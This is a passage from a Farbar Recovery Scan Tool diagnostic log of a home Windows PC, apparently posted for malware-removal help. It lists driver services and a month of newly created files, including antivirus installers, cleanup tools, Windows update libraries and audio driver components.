    S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
    U5 Netwtw02; C:\Windows\System32\Drivers\Netwtw02.sys [6724368 2016-02-06] (Intel Corporation)
    R3 Netwtw04; C:\WINDOWS\System32\drivers\Netwtw04.sys [7308560 2016-09-13] (Intel Corporation)
    R3 rt640x64; C:\WINDOWS\System32\drivers\rt640x64.sys [935168 2016-01-19] (Realtek                                            )
    S3 RTSPER; C:\WINDOWS\system32\DRIVERS\RtsPer.sys [769752 2016-01-20] (Realsil Semiconductor Corporation)
    S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [413912 2016-01-20] (Realsil Semiconductor Corporation)
    S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [58984 2016-02-22] (Synaptics Incorporated)
    R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [72824 2016-08-19] (Synaptics Incorporated)
    R0 trufos; C:\WINDOWS\System32\DRIVERS\trufos.sys [520032 2016-06-22] (BitDefender S.R.L.)
    S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
    S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
    S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
    R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31656 2016-04-14] (HP)
    U0 aswVmm; no ImagePath
     
    ==================== NetSvcs (Whitelisted) ===================
     
    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
     
     
    ==================== One Month Created files and folders ========
     
    (If an entry is included in the fixlist, the file/folder will be moved.)
     
    2017-02-01 17:45 - 2017-02-01 17:47 - 00023659 _____ C:\Users\Joseph\Downloads\FRST.txt
    2017-02-01 17:45 - 2017-02-01 17:45 - 00000000 ____D C:\FRST
    2017-02-01 17:43 - 2017-02-01 17:45 - 02420736 _____ (Farbar) C:\Users\Joseph\Downloads\FRST64.exe
    2017-02-01 17:20 - 2017-02-01 17:27 - 00000556 _____ C:\Users\Joseph\Desktop\JRT.txt
    2017-02-01 17:07 - 2017-02-01 17:08 - 00000789 _____ C:\bdlog.txt
    2017-02-01 17:02 - 2017-02-01 17:29 - 00000000 ____D C:\AdwCleaner
    2017-02-01 16:58 - 2017-02-01 17:15 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT (1).exe
    2017-02-01 16:56 - 2017-02-01 16:58 - 01663040 _____ (Malwarebytes) C:\Users\Joseph\Downloads\JRT.exe
    2017-02-01 16:54 - 2017-02-01 17:01 - 03988944 _____ C:\Users\Joseph\Downloads\AdwCleaner.exe
    2017-02-01 16:52 - 2017-02-01 16:52 - 00040137 _____ C:\ProgramData\dm.1485985887.bdinstall.bin
    2017-02-01 09:33 - 2017-02-01 09:33 - 00000385 _____ C:\WINDOWS\system32\user_gensett.xml
    2017-02-01 08:54 - 2017-02-01 08:54 - 00000000 ____D C:\Users\Joseph\AppData\Temp
    2017-02-01 08:52 - 2017-02-01 08:52 - 00056949 _____ C:\ProgramData\dm.1485956857.bdinstall.bin
    2017-02-01 08:51 - 2017-02-01 08:51 - 00000000 ____D C:\ProgramData\Bitdefender Device Management
    2017-02-01 08:47 - 2017-02-01 08:47 - 00403991 _____ C:\ProgramData\cl.1485956260.bdinstall.bin
    2017-02-01 08:47 - 2017-02-01 08:47 - 00003404 _____ C:\WINDOWS\System32\Tasks\Bitdefender AgentTask_AD394AE64E874073B10A89FEEC305A3C
    2017-02-01 08:45 - 2017-02-01 08:45 - 00002310 _____ C:\Users\Public\Desktop\Bitdefender 2017.lnk
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
    2017-02-01 08:45 - 2017-02-01 08:45 - 00000000 ____D C:\ProgramData\BDLogging
    2017-02-01 08:44 - 2016-09-20 04:17 - 01605376 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avc3.sys
    2017-02-01 08:44 - 2016-09-20 04:16 - 00878072 _____ (BitDefender) C:\WINDOWS\system32\Drivers\avckf.sys
    2017-02-01 08:44 - 2016-03-14 22:04 - 00023672 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\bdelam.sys
    2017-02-01 08:44 - 2015-12-04 19:27 - 00087912 _____ (BitDefender) C:\WINDOWS\system32\Drivers\bdvedisk.sys
    2017-02-01 08:44 - 2007-04-11 11:11 - 00511328 _____ (Microsoft Corporation) C:\WINDOWS\capicom.dll
    2017-02-01 08:43 - 2017-02-01 08:51 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\Bitdefender
    2017-02-01 08:43 - 2016-11-17 05:00 - 00309280 _____ (Bitdefender) C:\WINDOWS\system32\Drivers\ignis.sys
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\ProgramData\Bitdefender
    2017-02-01 08:38 - 2017-02-01 08:47 - 00000000 ____D C:\Program Files\Bitdefender
    2017-02-01 08:38 - 2016-10-29 08:54 - 00182944 _____ (BitDefender LLC) C:\WINDOWS\system32\Drivers\gzflt.sys
    2017-02-01 08:38 - 2016-06-22 14:40 - 00520032 _____ (BitDefender S.R.L.) C:\WINDOWS\system32\Drivers\trufos.sys
    2017-02-01 08:37 - 2017-02-01 08:38 - 00000000 ____D C:\Program Files\Common Files\Bitdefender
    2017-02-01 08:37 - 2017-02-01 08:37 - 00000000 ____D C:\Users\Joseph\AppData\Roaming\QuickScan
    2017-02-01 08:29 - 2017-02-01 08:29 - 00003794 _____ C:\WINDOWS\System32\Tasks\Bitdefender Agent WatchDog_65D6944A0EF74FDAB96E31112AD39864
    2017-02-01 08:27 - 2017-02-01 17:38 - 00000000 ____D C:\Program Files\Bitdefender Agent
    2017-02-01 08:27 - 2017-02-01 08:27 - 00047353 _____ C:\ProgramData\agent.1485955633.bdinstall.bin
    2017-02-01 08:27 - 2017-02-01 08:27 - 00000000 ____D C:\ProgramData\Bitdefender Agent
    2017-02-01 08:26 - 2017-02-01 08:27 - 11842648 _____ C:\Users\Joseph\Downloads\bitdefender_windows_43ea11d5-575e-4d5e-84a9-5683192df898.exe
    2017-01-31 23:27 - 2017-01-31 23:27 - 00000017 _____ C:\Users\Joseph\AppData\Local\resmon.resmoncfg
    2017-01-31 23:13 - 2017-01-31 23:13 - 00251848 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\132034FB.sys
    2017-01-31 15:37 - 2017-01-31 15:37 - 01923396 _____ C:\Users\Joseph\Downloads\hospital visit.pdf
    2017-01-30 20:58 - 2017-01-30 20:59 - 02059056 _____ (The Nielsen Company) C:\Users\Joseph\Downloads\ShopTracker_033D6D4A68A315B4A000 (2).exe
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\WINDOWS\System32\Tasks\AVAST Software
    2017-01-28 01:57 - 2017-01-28 01:57 - 00000000 ____D C:\Program Files\Common Files\AV
    2017-01-25 00:02 - 2016-12-21 02:08 - 00142848 _____ (Microsoft Corporation) C:\WINDOWS\system32\poqexec.exe
    2017-01-25 00:02 - 2016-12-20 23:44 - 00120320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\poqexec.exe
    2017-01-24 23:47 - 2017-01-21 21:14 - 00485032 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
    2017-01-24 17:47 - 2017-01-24 17:47 - 10697014 _____ C:\Users\Joseph\Downloads\FDN_Glyphosate_FoodTesting_Report_p2016.pdf
    2017-01-24 13:33 - 2017-01-24 13:33 - 00083650 _____ C:\Users\Joseph\Downloads\visit 1-23.pdf
    2017-01-21 13:55 - 2017-02-01 08:34 - 00000000 ____D C:\ProgramData\AVAST Software
    2017-01-21 13:55 - 2017-01-21 13:55 - 06253640 _____ (AVAST Software) C:\Users\Joseph\Downloads\avast_free_antivirus_setup_online_cnet_2.exe
    2017-01-20 13:28 - 2017-01-20 13:28 - 00000184 _____ C:\Users\Joseph\AppData\Roaming\6ov.vbs
    2017-01-19 21:09 - 2017-01-19 21:09 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill (2).pdf
    2017-01-19 21:09 - 2017-01-19 21:09 - 00150985 _____ C:\Users\Joseph\Downloads\PDF_Bill (3).pdf
    2017-01-19 21:08 - 2017-01-19 21:08 - 00199440 _____ C:\Users\Joseph\Downloads\PDF_Bill (1).pdf
    2017-01-19 21:06 - 2017-01-19 21:06 - 00001115 _____ C:\Users\Joseph\Downloads\AccountEnergyUsage.csv
    2017-01-19 20:26 - 2017-01-19 20:26 - 00223944 _____ C:\Users\Joseph\Downloads\djcxMjYtODA5MC04MDkxLTgzNjMtT0lCMS00MDRGQUFCQi0wLTIyMzk0NC00Nzk2ODE3LTIyMzk0NC04NS02OC0wLTE2OS0wLV4BUAExNzA5NgEyMzYxNAE0AUNCQwFDQkMwMQEyMDA0LTAwMDEBQUNDRVNTIE5BVElPTkFMIENPUlBPUkFUSU9OIFBST0ZJVCBTSEFSSU5HIFBMQU4BTkEBUk.pdf
    2017-01-19 14:36 - 2017-01-19 14:36 - 00000000 ____D C:\Users\Joseph\AppData\LocalLow\Temp
    2017-01-18 22:07 - 2017-01-18 22:07 - 00676419 _____ C:\Users\Joseph\Downloads\137230-201711873115438.pdf
    2017-01-15 18:00 - 2017-01-15 18:00 - 00151143 _____ C:\Users\Joseph\Downloads\PDF_Bill.pdf
    2017-01-15 16:33 - 2017-01-15 16:33 - 00086004 _____ C:\Users\Joseph\Downloads\DS82_Complete (1).pdf
    2017-01-15 16:15 - 2017-01-15 16:15 - 00683112 _____ C:\Users\Joseph\Downloads\taxReturn (1).tax2016
    2017-01-15 16:11 - 2017-01-15 16:24 - 01487502 _____ C:\Users\Joseph\Downloads\taxReturn.tax2016
    2017-01-15 15:50 - 2017-01-15 15:50 - 06281998 _____ C:\Users\Joseph\Downloads\C2 Artist Mini-Posters.pdf
    2017-01-15 15:44 - 2017-01-15 15:44 - 00002529 _____ C:\Users\Public\Desktop\TurboTax 2016.lnk
    2017-01-15 15:44 - 2017-01-15 15:44 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TurboTax 2016
    2017-01-15 15:29 - 2017-01-15 15:30 - 121060464 _____ C:\Users\Joseph\Downloads\turbotax_deluxe_2016_windows.exe
    2017-01-14 21:56 - 2017-01-14 21:56 - 00085948 _____ C:\Users\Joseph\Downloads\DS82_Complete.pdf
    2017-01-14 11:22 - 2017-01-14 11:22 - 00235450 _____ C:\Users\Joseph\Downloads\CAMP_CONNECTION_CARNIVAL_flier2106.pdf
    2017-01-13 15:55 - 2017-01-13 15:53 - 72520712 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoRes64.dat
    2017-01-13 15:55 - 2017-01-13 15:53 - 07704619 _____ C:\WINDOWS\system32\Drivers\RTAIODAT.DAT
    2017-01-13 15:55 - 2017-01-13 15:53 - 03204096 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtPgEx64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 03014144 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTSnMg64.cpl
    2017-01-13 15:55 - 2017-01-13 15:53 - 02706856 _____ (DTS, Inc.) C:\WINDOWS\system32\sltech64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 02201088 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RCoInstII64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01615656 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64APO.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01529136 _____ (Conexant Systems Inc.) C:\WINDOWS\system32\CX64Proxy.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01435136 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRRPTR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01360512 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RTCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 01003320 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDHF64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00984912 _____ (DTS, Inc.) C:\WINDOWS\system32\sl3apo64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00865912 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SEHDHF32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00859216 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEHDRA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00850400 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SECOMN64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00721800 _____ (Sound Research, Corp.) C:\WINDOWS\SysWOW64\SECOMN32.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00689872 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtDataProc64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00574752 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAC64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00532376 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSTSX64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00499152 _____ (Sound Research, Corp.) C:\WINDOWS\system32\SEAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00467152 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRAPO64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00438688 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\CAF64APO2.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00387312 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEP64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00381400 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00343704 _____ (Realtek Semiconductor Corp.) C:\WINDOWS\system32\RtlCPAPI64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\SysWOW64\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00341144 _____ (Synopsys, Inc.) C:\WINDOWS\system32\SRCOM.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DHT64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00321712 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RP3DAA64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00258864 _____ (TODO: <Company name>) C:\WINDOWS\system32\slprp64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00214832 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEED64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00166200 _____ (SRS Labs, Inc.) C:\WINDOWS\system32\SRSWOW64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00122320 _____ (Real Sound Lab SIA) C:\WINDOWS\system32\CONEQMSAPOGUILibrary.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00118592 _____ (Andrea Electronics Corporation) C:\WINDOWS\system32\AERTAR64.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00112488 _____ (Conexant Systems, Inc.) C:\WINDOWS\system32\Caf64api.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00110984 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEL64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00088344 _____ (Dolby Laboratories, Inc.) C:\WINDOWS\system32\RTEEG64A.dll
    2017-01-13 15:55 - 2017-01-13 15:53 - 00005604 _____ C:\WINDOWS\system32\cxapo.lncs
    2017-01-13 15:55 - 2017-01-13 15:53 - 00000736 _____ C:\WINDOWS\system32\cxapo.prop
    2017-01-11 23:08 - 2017-01-11 23:08 - 02604526 _____ C:\Users\Joseph\Downloads\AAS-L2-Student-Packet-Sample.pdf
    2017-01-11 22:56 - 2017-01-11 22:56 - 02399782 _____ C:\Users\Joseph\Downloads\AAS-L1-Student-Packet-Sample.pdf
    2017-01-11 22:55 - 2017-01-11 22:55 - 05323693 _____ C:\Users\Joseph\Downloads\AAR-L1-2ndEd-CobwebtheCat-Sample.pdf
    2017-01-11 15:10 - 2017-01-11 15:10 - 05432492 _____ C:\Users\Joseph\Downloads\01-08-2017.pdf
    2017-01-11 15:07 - 2017-01-11 15:07 - 00106459 _____ C:\Users\Joseph\Downloads\bill_10912246.pdf
    2017-01-10 22:58 - 2016-12-21 00:09 - 00263472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Storage.ApplicationData.dll
    2017-01-10 22:58 - 2016-12-21 00:01 - 20969928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
    2017-01-10 22:58 - 2016-12-20 23:46 - 00034304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
    2017-01-10 22:58 - 2016-12-20 23:43 - 00285184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:58 - 2016-12-20 23:41 - 00253952 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.BioFeedback.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00557568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\StoreAgent.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00318976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpencom.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncSettings.dll
    2017-01-10 22:58 - 2016-12-20 23:40 - 00180224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
    2017-01-10 22:58 - 2016-12-20 23:39 - 00223232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgentUserBroker.exe
    2017-01-10 22:58 - 2016-12-20 23:38 - 00866816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Cred.dll
    2017-01-10 22:58 - 2016-12-20 23:34 - 07626752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 05398016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aclui.dll
    2017-01-10 22:58 - 2016-12-20 23:30 - 01255936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
    2017-01-10 22:58 - 2016-12-20 23:25 - 07469056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 01883648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
    2017-01-10 22:58 - 2016-12-20 23:22 - 00860672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
    2017-01-10 22:58 - 2016-12-14 00:08 - 00341344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msv1_0.dll
    2017-01-10 22:58 - 2016-12-14 00:06 - 00509792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncHost.exe
    2017-01-10 22:58 - 2016-12-14 00:01 - 01557808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
    2017-01-10 22:58 - 2016-12-13 23:45 - 00147968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32k.sys
    2017-01-10 22:58 - 2016-12-13 23:42 - 00167424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinSCard.dll
    2017-01-10 22:58 - 2016-12-13 23:36 - 00074752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\updatepolicy.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00712192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wuapi.dll
    2017-01-10 22:58 - 2016-12-13 23:35 - 00553984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cryptui.dll
    2017-01-10 22:58 - 2016-12-13 23:22 - 02998272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
    2017-01-10 22:58 - 2016-12-13 23:22 - 02748416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rdpcore.dll
    2017-01-10 22:57 - 2016-12-21 00:59 - 00218976 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\offlinesam.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 03892864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01852720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01360464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01277344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 01201872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
    2017-01-10 22:57 - 2016-12-21 00:02 - 00980832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetcore.dll
    2017-01-10 22:57 - 2016-12-20 23:41 - 00231936 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.LockScreen.dll
    2017-01-10 22:57 - 2016-12-20 23:39 - 01300480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVPXENC.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 04612608 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
    2017-01-10 22:57 - 2016-12-20 23:35 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\indexeddbserver.dll
    2017-01-10 22:57 - 2016-12-20 23:33 - 19413504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
    2017-01-10 22:57 - 2016-12-20 23:32 - 19417600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
    2017-01-10 22:57 - 2016-12-20 23:27 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
    2017-01-10 22:57 - 2016-12-20 23:26 - 01155072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVP9DEC.dll
    2017-01-10 22:57 - 2016-12-20 23:25 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
    2017-01-10 22:57 - 2016-12-20 23:24 - 06044160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 05061120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d2d1.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 03733504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3DCompiler_47.dll
    2017-01-10 22:57 - 2016-12-20 23:24 - 00886272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
    2017-01-10 22:57 - 2016-12-14 00:21 - 02206496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msmpeg2vdec.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00382784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AUDIOKSE.dll
    2017-01-10 22:57 - 2016-12-14 00:01 - 00076984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\remoteaudioendpoint.dll
    2017-01-10 22:57 - 2016-12-13 23:46 - 01631232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Resources.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00231424 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudBackupSettings.dll
    2017-01-10 22:57 - 2016-12-13 23:40 - 00104448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.UI.Logon.ProxyStub.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 13869056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
    2017-01-10 22:57 - 2016-12-13 23:38 - 00213504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.CredDialogController.dll
    2017-01-10 22:57 - 2016-12-13 23:35 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00806400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\D3D12.dll
    2017-01-10 22:57 - 2016-12-13 23:32 - 00497152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LogonController.dll
    2017-01-10 22:57 - 2016-11-02 07:01 - 00484584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AudioSes.dll
    2017-01-10 22:57 - 2016-08-01 23:30 - 00822784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
    2017-01-10 22:48 - 2016-12-21 02:49 - 00328008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Storage.ApplicationData.dll
    2017-01-10 22:47 - 2016-12-21 03:08 - 00136032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ImplatSetup.dll
    2017-01-10 22:47 - 2016-12-21 03:04 - 07816032 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
    2017-01-10 22:47 - 2016-12-21 02:43 - 04130440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01454504 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetsrc.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 01071736 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll
    2017-01-10 22:47 - 2016-12-21 02:43 - 00092512 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 22224480 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01988560 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01702392 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:42 - 01300600 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
    2017-01-10 22:47 - 2016-12-21 02:41 - 01600632 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppobjs.dll
    2017-01-10 22:47 - 2016-12-21 02:14 - 00043008 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
    2017-01-10 22:47 - 2016-12-21 02:13 - 00119808 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCsp.dll
    2017-01-10 22:47 - 2016-12-21 02:12 - 00083968 _____ (Microsoft Corporation) C:\WINDOWS\system32\ProvPluginEng.dll
    2017-01-10 22:47 - 2016-12-21 02:10 - 00234496 _____ (Microsoft Corporation) C:\WINDOWS\system32\KnobsCore.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00368640 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneBackupHandler.dll
    2017-01-10 22:47 - 2016-12-21 02:09 - 00363520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BioFeedback.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 01292288 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVPXENC.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00418304 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.BlockedShutdown.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00360448 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpencom.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00349184 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00289792 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeveloperOptionsSettingsHandlers.dll
    2017-01-10 22:47 - 2016-12-21 02:08 - 00211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
    2017-01-10 22:47 - 2016-12-21 02:07 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\StoreAgent.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00310784 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncSettings.dll
    2017-01-10 22:47 - 2016-12-21 02:06 - 00260608 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgentUserBroker.exe
    2017-01-10 22:47 - 2016-12-21 02:06 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\winsrv.dll
